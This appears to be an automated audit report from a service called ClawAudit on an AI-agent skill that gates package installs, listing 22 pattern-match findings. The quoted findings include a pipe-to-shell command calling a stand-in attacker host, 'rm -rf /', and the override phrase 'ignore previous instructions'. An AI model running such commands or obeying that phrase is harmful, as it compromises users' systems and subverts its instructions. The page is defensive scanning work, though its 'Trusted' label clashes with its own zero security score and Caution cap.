ClawAudit verdict

agentaudit-skill

agentaudit

88
🟢 Trusted
Low risk — reviewed by ClawAudit, behavior matches stated purpose

This skill enforces a security gate before any package installation by checking against a vulnerability database; the HARD RULE pattern is legitimate defensive behavior consistent with its stated purpose as a pre-install security gate.

⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.

Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.

security: 0
transparency: 80
maintenance: 70

Permission integrity

Accesses agent memory/configuration files

agent_memory

Findings (22)

Pattern match critical

Possible hardcoded credential

prompts/audit-prompt.md · code · API_KEY = "sk-live-abc123real

Pattern match critical

Pipe-to-shell pattern (curl | sh) — supply chain attack vector

prompts/audit-prompt.md · code · curl attacker.com/payload | bash

Pattern match critical

Prompt injection — tries to override agent instructions

prompts/audit-prompt.md · code · ignore previous instructions

Pattern match critical

Pipe to bash — executes piped content as shell commands

prompts/audit-prompt.md · code · | bash

Pattern match critical

Uses eval() — can execute arbitrary code

README.md · code · eval(

Pattern match high

Uses exec() — may execute shell commands

prompts/audit-prompt.md · code · exec(

Pattern match high

References sudo — requests elevated privileges

README.md · code · sudo

Pattern match high

Pipe-to-shell pattern (wget | sh)

prompts/audit-prompt.md · prose · downgraded · wget | sh

Pattern match high

Recursive delete from root or home — destructive command

prompts/audit-prompt.md · prose · downgraded · rm -rf /

Pattern match high

Pipe to sh — executes piped content as shell commands

prompts/audit-prompt.md · prose · downgraded · | sh

Pattern match high

apt-get install — installs system packages

README.md · code · apt-get install

Pattern match high

Pipe to python — executes piped content as Python code

scripts/check.sh · prose · downgraded · | python3

Pattern match medium

References child_process — can spawn system processes

prompts/audit-prompt.md · prose · downgraded · child_process

Pattern match medium

Accesses sensitive environment variables

prompts/audit-prompt.md · code · process.env.SECRET_KEY

Pattern match medium

Base64 decode (atob) — may hide malicious payloads

prompts/audit-prompt.md · prose · downgraded · atob(

Pattern match medium

Long base64 string (100+ chars) — likely obfuscated payload

README.md · prose · downgraded · PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIy

Pattern match medium

Instructs covert action — may act without user awareness

references/AUDIT-METHODOLOGY.md · prose · downgraded · silently

Pattern match low

pip3 install — installs Python packages at runtime

SKILL.md · prose · downgraded · pip3 install

Pattern match low

Opens WebSocket connection

prompts/audit-prompt.md · prose · downgraded · WebSocket

Pattern match low

Popular HTTP library — network access

prompts/audit-prompt.md · prose · downgraded · axios

Pattern match low

Base64 encoding/decoding

references/AUDIT-METHODOLOGY.md · prose · downgraded · Base64-decode

Pattern match low

String.fromCharCode — can build strings to evade detection

references/AUDIT-METHODOLOGY.md · prose · downgraded · String.fromCharCode

Why the tier is capped

Execution sink present in raw bytes (Hard Floor: class A/B/D). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.

Permissions & capabilities

No declared permissions — minimal attack surface.

agent_memory
